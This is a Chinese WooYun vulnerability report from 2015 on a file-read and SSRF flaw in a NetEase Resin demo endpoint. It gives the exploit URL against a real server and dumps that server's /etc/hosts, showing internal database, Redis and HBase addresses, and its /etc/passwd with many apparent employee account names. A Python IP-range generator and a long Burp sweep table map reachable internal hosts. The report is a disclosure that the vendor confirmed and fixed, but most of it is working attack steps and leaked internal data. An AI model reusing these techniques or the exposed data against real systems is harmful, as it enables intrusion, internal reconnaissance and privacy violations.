当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0157113

漏洞标题:网易某处文件读取可内网拓扑(差点进内网)

相关厂商:网易

漏洞作者: 殺器王子

提交时间:2015-11-30 17:30

修复时间:2016-01-17 14:54

公开时间:2016-01-17 14:54

漏洞类型:任意文件遍历/下载

危害等级:高

自评Rank:13

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-30: 细节已通知厂商并且等待厂商处理中
2015-12-03: 厂商已经确认,细节仅向厂商公开
2015-12-13: 细节向核心白帽子及相关领域专家公开
2015-12-23: 细节向普通白帽子公开
2016-01-02: 细节向实习白帽子公开
2016-01-17: 细节向公众公开

简要描述:

你家楼下的全聚德很好吃,就是排队等号很讨厌。

详细说明:

http://220.181.8.205:8081//resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/hosts


inputFile: /etc/hosts
127.0.0.1 localhost netease-datanode1
::1 localhost ip6-localhost ip6-loopback
fe00::0 ip6-localnet
ff00::0 ip6-mcastprefix
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
ff02::3 ip6-allhosts
192.168.2.108 host.zhu.org host
127.0.0.1 new1.bbs.163.com
#10.100.21.81 test.bbs.163.com
#220.181.29.116 newmq1.bbs.163.com
#220.181.29.116 newmq2.bbs.163.com
#for redis
192.168.86.36 redis.bbs.redis.rebuild
#redis-backup
#192.168.52.109 redis.bbs.redis.rebuild
#192.168.86.200 redis.bbs.redis.rebuild
#DB hosts
#192.168.51.169 bbs.db.mysql.rebuild
#192.168.51.169 new.db.mysql.bbs.news
#new bbs db
#192.168.51.169 v2.bbs.db.mysql
192.168.51.169 v2.2.bbs.db.mysql
#10.100.21.208 v2.2.bbs.db.mysql
10.100.21.208 v2.bbs.db.mysql
#10.100.21.208 sports.bbs.db.mysql
#10.100.21.208 news.bbs.db.mysql
192.168.51.169 sports.bbs.db.mysql
192.168.51.169 news.bbs.db.mysql
10.100.21.208 club.bbs.db.mysql
10.100.21.208 lady.bbs.db.mysql
10.100.21.208 money.bbs.db.mysql
10.100.21.208 bobo.bbs.db.mysql
#192.168.51.169 club.bbs.db.mysql
#192.168.51.169 lady.bbs.db.mysql
#192.168.51.169 money.bbs.db.mysql
192.168.51.169 test.bbs.db.mysql
#192.168.86.152 bbs.lady.bbs.mysql.163.com
#192.168.86.152 bbs.sz.house.bbs.mysql.163.com
#192.168.86.152 bbs.sh.house.bbs.mysql.163.com
#HBase
192.168.86.193 n5
192.168.51.152 n4
192.168.86.200 n3
192.168.86.118 n2
192.168.51.83 n1
10.100.20.173 n6
#106.2.34.79 hongbao.163.com
10.100.20.24 live.163.com
#10.100.20.47 redis.bbs.redis.rebuild
back to demo

inputFile: /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:103::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin
ypxiao:x:1005:100::/home/ypxiao:/bin/sh
liuxb:x:1006:100::/home/liuxb:/bin/sh
strong:x:1013:4::/home/strong:/bin/sh
zhangjl:x:1014:4::/home/zhangjl:/bin/sh
xiongx:x:1015:4::/home/xiongx:/bin/sh
xgtai:x:1016:4::/home/xgtai:/bin/sh
rauljin:x:1017:4::/home/rauljin:/bin/sh
nagios:x:1019:1019::/home/nrpe:/sbin/nologin
messagebus:x:104:105::/var/run/dbus:/bin/false
wangjing:x:1020:100::/home/wangjing:/bin/sh
hujh:x:1021:100::/home/hujh:/bin/sh
hadoop:x:1022:1020::/home/hadoop:/bin/sh
gaofei:x:1023:100::/home/gaofei:/bin/sh
zhou.peng:x:1024:100::/home/zhou.peng:/bin/sh
hgliu:x:1025:100::/home/hgliu:/bin/sh
houhuihui:x:1026:100::/home/houhuihui:/bin/sh
fukan:x:1027:100::/home/fukan:/bin/sh
junli2010:x:1028:100::/home/junli2010:/bin/sh
bjzhaojh:x:1030:100::/home/bjzhaojh:/bin/sh
bjzhangxin:x:1032:4::/home/bjzhangxin:/bin/sh
liss:x:1039:100::/home/liss:/bin/sh
yangfan2010:x:1040:100::/home/yangfan2010:/bin/sh
sfniu:x:1041:100::/home/sfniu:/bin/sh
varnish:x:105:106::/home/varnish:/bin/false
varnishlog:x:106:107::/home/varnishlog:/bin/false
hyshang:x:1042:100::/home/hyshang:/bin/sh
linren:x:1043:100::/home/linren:/bin/sh
fabric:x:1044:100::/home/fabric:/bin/sh
sunxs:x:1045:100::/home/sunxs:/bin/sh
zhangjinpeng:x:1046:100::/home/zhangjinpeng:/bin/sh
bjzhangfeng:x:1047:100::/home/bjzhangfeng:/bin/sh
longbai:x:1049:100::/home/longbai:/bin/sh
hzchenxingxing:x:1050:100::/home/hzchenxingxing:/bin/sh
bjanduo:x:1051:4::/home/bjanduo:/bin/sh
back to demo


可以利用http://wiki.wooyun.org/pentest:filepath里的字典再爆破

38BCB11B-E0A5-4D0E-83D7-1A7DAA66EC32.png


漏洞证明:

该接口除了存在文件读取也可以当SSRF用。
使用个正则表达式匹配下ip段

((25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|\d)\.){3}(25[0-5]|2[0-4]\d|1\d\d|[1-9]\d|[1-9])

得到ip:
127.0.0.1
192.168.2.108
127.0.0.1
10.100.21.81
220.181.29.116
220.181.29.116
192.168.86.36
192.168.52.109
192.168.86.200
192.168.51.169
192.168.51.169
192.168.51.169
192.168.51.169
10.100.21.208
10.100.21.208
10.100.21.208
10.100.21.208
192.168.51.169
192.168.51.169
10.100.21.208
10.100.21.208
10.100.21.208
10.100.21.208
192.168.51.169
192.168.51.169
192.168.51.169
192.168.51.169
192.168.86.152
192.168.86.152
192.168.86.152
192.168.86.193
192.168.51.152
192.168.86.200
192.168.86.118
192.168.51.83
10.100.20.173
106.2.34.79
10.100.20.24
10.100.20.47
再使用python生成ip段扔入burp suite跑

import time
time_start = time.time()
def get_ip(number='10' ,start='1.1.1.1' ): 
    file = open('ip_list.txt', 'w') 
    starts = start.split( '.')
    A = int(starts[0])
    B = int(starts[1])
    C = int(starts[2])
    D = int(starts[3])   
    for A in range(A,256): #最大值为256
        for B in range(B, 256):
            for C in range(C, 256):
                for D in range(D, 256):
                    ip = "%d.%d.%d.%d" %(A,B,C,D) 
                                       
                    if number > 1:                         
                        file.write(ip+ '\n')
                        number -= 1                      
                    elif number == 1:    #解决最后多一行回车问题
                        file.write(ip)
                        number -= 1
                    else:
                        file.close()
                        print ip
                        return                     
                D = 0
            C = 0
        B = 0   
get_ip(25500,'10.100.20.1') #生成ip数量,开使ip
time_end = time.time()
time = time_end - time_start
print '耗时%s秒' %time


1304FB3C-185D-46FE-871A-B6C0C95A27EB.png

成功则返回长度和失败的长度一目了然

4B114175-2C28-4CCF-AA12-CAE2712BB1AB.png


失败回返回500且长度大概为1650-1660之间。

6011C0B9-15E9-4664-91E2-9BDF9B001B3E.png

有些直接返回网页,说明即可正常访问。其中暴露不少后台或者内部系统等。

55	10.100.20.55	200	false	false	336	false	
57	10.100.20.57	200	false	false	336	false	
347	10.100.21.91	200	false	false	336	false	
144	10.100.20.144	200	false	false	337	false	
179	10.100.20.179	200	false	false	337	false	
397	10.100.21.141	200	false	false	337	false	
449	10.100.21.193	200	false	false	337	false	
454	10.100.21.198	200	false	false	337	false	
458	10.100.21.202	200	false	false	337	false	
462	10.100.21.206	200	false	false	337	false	
488	10.100.21.232	200	false	false	337	false	
110	10.100.20.110	200	false	false	339	false	
428	10.100.21.172	200	false	false	345	false	
261	10.100.21.5	200	false	false	348	false	
262	10.100.21.6	200	false	false	348	false	
15	10.100.20.15	200	false	false	349	false	
52	10.100.20.52	200	false	false	349	false	
273	10.100.21.17	200	false	false	349	false	
284	10.100.21.28	200	false	false	349	false	
343	10.100.21.87	200	false	false	349	false	
108	10.100.20.108	200	false	false	350	false	
114	10.100.20.114	200	false	false	350	false	
121	10.100.20.121	200	false	false	350	false	
180	10.100.20.180	200	false	false	350	false	
205	10.100.20.205	200	false	false	350	false	
206	10.100.20.206	200	false	false	350	false	
248	10.100.20.248	200	false	false	350	false	
254	10.100.20.254	200	false	false	350	false	
358	10.100.21.102	200	false	false	350	false	
359	10.100.21.103	200	false	false	350	false	
360	10.100.21.104	200	false	false	350	false	
361	10.100.21.105	200	false	false	350	false	
388	10.100.21.132	200	false	false	350	false	
389	10.100.21.133	200	false	false	350	false	
390	10.100.21.134	200	false	false	350	false	
395	10.100.21.139	200	false	false	350	false	
396	10.100.21.140	200	false	false	350	false	
465	10.100.21.209	200	false	false	350	false	
466	10.100.21.210	200	false	false	350	false	
467	10.100.21.211	200	false	false	350	false	
468	10.100.21.212	200	false	false	350	false	
473	10.100.21.217	200	false	false	350	false	
54	10.100.20.54	200	false	false	352	false	
0		200	false	false	355	false	baseline request
128	10.100.20.128	200	false	false	359	false	
140	10.100.20.140	200	false	false	359	false	
299	10.100.21.43	200	false	false	376	false	
338	10.100.21.82	200	false	false	376	false	
340	10.100.21.84	200	false	false	376	false	
391	10.100.21.135	200	false	false	377	false	
394	10.100.21.138	200	false	false	377	false	
399	10.100.21.143	200	false	false	377	false	
457	10.100.21.201	200	false	false	377	false	
463	10.100.21.207	200	false	false	377	false	
498	10.100.21.242	200	false	false	377	false	
125	10.100.20.125	200	false	false	403	false	
39	10.100.20.39	200	false	false	404	false	
132	10.100.20.132	200	false	false	405	false	
440	10.100.21.184	200	false	false	405	false	
362	10.100.21.106	200	false	false	441	false	
63	10.100.20.63	200	false	false	447	false	
91	10.100.20.91	200	false	false	447	false	
168	10.100.20.168	200	false	false	448	false	
2609	10.100.30.49	200	false	false	463	false	
4	10.100.20.4	200	false	false	487	false	
270	10.100.21.14	200	false	false	488	false	
352	10.100.21.96	200	false	false	488	false	
135	10.100.20.135	200	false	false	489	false	
161	10.100.20.161	200	false	false	489	false	
204	10.100.20.204	200	false	false	489	false	
356	10.100.21.100	200	false	false	489	false	
372	10.100.21.116	200	false	false	489	false	
382	10.100.21.126	200	false	false	489	false	
279	10.100.21.23	200	false	false	491	false	
238	10.100.20.238	200	false	false	492	false	
422	10.100.21.166	200	false	false	492	false	
264	10.100.21.8	200	false	false	496	false	
11	10.100.20.11	200	false	false	497	false	
59	10.100.20.59	200	false	false	497	false	
60	10.100.20.60	200	false	false	497	false	
64	10.100.20.64	200	false	false	497	false	
326	10.100.21.70	200	false	false	497	false	
10	10.100.20.10	200	false	false	498	false	
9	10.100.20.9	200	false	false	498	false	
20	10.100.20.20	200	false	false	498	false	
237	10.100.20.237	200	false	false	498	false	
471	10.100.21.215	200	false	false	498	false	
472	10.100.21.216	200	false	false	498	false	
478	10.100.21.222	200	false	false	498	false	
14	10.100.20.14	200	false	false	499	false	
23	10.100.20.23	200	false	false	499	false	
50	10.100.20.50	200	false	false	499	false	
56	10.100.20.56	200	false	false	499	false	
69	10.100.20.69	200	false	false	499	false	
71	10.100.20.71	200	false	false	499	false	
76	10.100.20.76	200	false	false	499	false	
287	10.100.21.31	200	false	false	499	false	
288	10.100.21.32	200	false	false	499	false	
329	10.100.21.73	200	false	false	499	false	
330	10.100.21.74	200	false	false	499	false	
335	10.100.21.79	200	false	false	499	false	
354	10.100.21.98	200	false	false	499	false	
117	10.100.20.117	200	false	false	500	false	
118	10.100.20.118	200	false	false	500	false	
129	10.100.20.129	200	false	false	500	false	
130	10.100.20.130	200	false	false	500	false	
137	10.100.20.137	200	false	false	500	false	
170	10.100.20.170	200	false	false	500	false	
171	10.100.20.171	200	false	false	500	false	
185	10.100.20.185	200	false	false	500	false	
223	10.100.20.223	200	false	false	500	false	
224	10.100.20.224	200	false	false	500	false	
225	10.100.20.225	200	false	false	500	false	
231	10.100.20.231	200	false	false	500	false	
242	10.100.20.242	200	false	false	500	false	
363	10.100.21.107	200	false	false	500	false	
366	10.100.21.110	200	false	false	500	false	
367	10.100.21.111	200	false	false	500	false	
368	10.100.21.112	200	false	false	500	false	
369	10.100.21.113	200	false	false	500	false	
378	10.100.21.122	200	false	false	500	false	
417	10.100.21.161	200	false	false	500	false	
420	10.100.21.164	200	false	false	500	false	
436	10.100.21.180	200	false	false	500	false	
437	10.100.21.181	200	false	false	500	false	
475	10.100.21.219	200	false	false	500	false	
95	10.100.20.95	200	false	false	503	false	
94	10.100.20.94	200	false	false	503	false	
97	10.100.20.97	200	false	false	503	false	
348	10.100.21.92	200	false	false	503	false	
247	10.100.20.247	200	false	false	504	false	
398	10.100.21.142	200	false	false	504	false	
400	10.100.21.144	200	false	false	504	false	
2638	10.100.30.78	200	false	false	504	false	
12	10.100.20.12	200	false	false	505	false	
342	10.100.21.86	200	false	false	505	false	
353	10.100.21.97	200	false	false	505	false	
29	10.100.20.29	200	false	false	506	false	
48	10.100.20.48	200	false	false	506	false	
61	10.100.20.61	200	false	false	506	false	
72	10.100.20.72	200	false	false	506	false	
81	10.100.20.81	200	false	false	506	false	
88	10.100.20.88	200	false	false	506	false	
93	10.100.20.93	200	false	false	506	false	
92	10.100.20.92	200	false	false	506	false	
211	10.100.20.211	200	false	false	506	false	
271	10.100.21.15	200	false	false	506	false	
281	10.100.21.25	200	false	false	506	false	
418	10.100.21.162	200	false	false	506	false	
455	10.100.21.199	200	false	false	506	false	
485	10.100.21.229	200	false	false	506	false	
486	10.100.21.230	200	false	false	506	false	
104	10.100.20.104	200	false	false	507	false	
181	10.100.20.181	200	false	false	507	false	
191	10.100.20.191	200	false	false	507	false	
202	10.100.20.202	200	false	false	507	false	
203	10.100.20.203	200	false	false	507	false	
208	10.100.20.208	200	false	false	507	false	
502	10.100.21.246	200	false	false	508	false	
296	10.100.21.40	200	false	false	509	false	
100	10.100.20.100	200	false	false	510	false	
175	10.100.20.175	200	false	false	510	false	
405	10.100.21.149	200	false	false	510	false	
406	10.100.21.150	200	false	false	510	false	
407	10.100.21.151	200	false	false	510	false	
413	10.100.21.157	200	false	false	510	false	
442	10.100.21.186	200	false	false	510	false	
459	10.100.21.203	200	false	false	510	false	
499	10.100.21.243	200	false	false	510	false	
221	10.100.20.221	200	false	false	511	false	
341	10.100.21.85	200	false	false	512	false	
166	10.100.20.166	200	false	false	513	false	
319	10.100.21.63	200	false	false	513	false	
461	10.100.21.205	200	false	false	513	false	
79	10.100.20.79	200	false	false	514	false	
173	10.100.20.173	200	false	false	514	false	
448	10.100.21.192	200	false	false	514	false	
451	10.100.21.195	200	false	false	514	false	
384	10.100.21.128	200	false	false	515	false	
456	10.100.21.200	200	false	false	522	false	
258	10.100.21.2	200	false	false	538	false	
2567	10.100.30.7	200	false	false	538	false	
357	10.100.21.101	200	false	false	540	false	
285	10.100.21.29	200	false	false	543	false	
346	10.100.21.90	200	false	false	543	false	
115	10.100.20.115	200	false	false	544	false	
377	10.100.21.121	200	false	false	544	false	
477	10.100.21.221	200	false	false	544	false	
294	10.100.21.38	200	false	false	556	false	
479	10.100.21.223	200	false	false	602	false	
2653	10.100.30.93	200	false	false	615	false	
13	10.100.20.13	200	false	false	624	false	
87	10.100.20.87	200	false	false	627	false	
85	10.100.20.85	200	false	false	628	false	
70	10.100.20.70	200	false	false	679	false	
157	10.100.20.157	200	false	false	707	false	
345	10.100.21.89	200	false	false	744	false	
182	10.100.20.182	200	false	false	745	false	
392	10.100.21.136	200	false	false	865	false	
393	10.100.21.137	200	false	false	865	false	
98	10.100.20.98	200	false	false	874	false	
308	10.100.21.52	200	false	false	874	false	
96	10.100.20.96	200	false	false	892	false	
489	10.100.21.233	200	false	false	893	false	
500	10.100.21.244	200	false	false	915	false	
337	10.100.21.81	200	false	false	935	false	
154	10.100.20.154	200	false	false	938	false	
450	10.100.21.194	200	false	false	938	false	
504	10.100.21.248	200	false	false	938	false	
17	10.100.20.17	200	false	false	949	false	
24	10.100.20.24	200	false	false	949	false	
28	10.100.20.28	200	false	false	949	false	
31	10.100.20.31	200	false	false	949	false	
35	10.100.20.35	200	false	false	949	false	
278	10.100.21.22	200	false	false	949	false	
282	10.100.21.26	200	false	false	949	false	
109	10.100.20.109	200	false	false	950	false	
123	10.100.20.123	200	false	false	950	false	
134	10.100.20.134	200	false	false	950	false	
158	10.100.20.158	200	false	false	950	false	
186	10.100.20.186	200	false	false	950	false	
385	10.100.21.129	200	false	false	950	false	
510	10.100.21.254	200	false	false	950	false	
178	10.100.20.178	200	false	false	1205	false	
5	10.100.20.5	200	false	false	1337	false	
58	10.100.20.58	200	false	false	1341	false	
212	10.100.20.212	200	false	false	1345	false	
42	10.100.20.42	200	false	false	1365	false

修复方案:

https://login.netease.com/accounts/login/?next=/sitemgnt/

D2C521BD-3A29-472D-95AE-280CFABFA35E.png


版权声明:转载请注明来源 殺器王子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-12-03 14:54

厂商回复:

漏洞已修复,感谢您对网易产品的关注。

最新状态:

暂无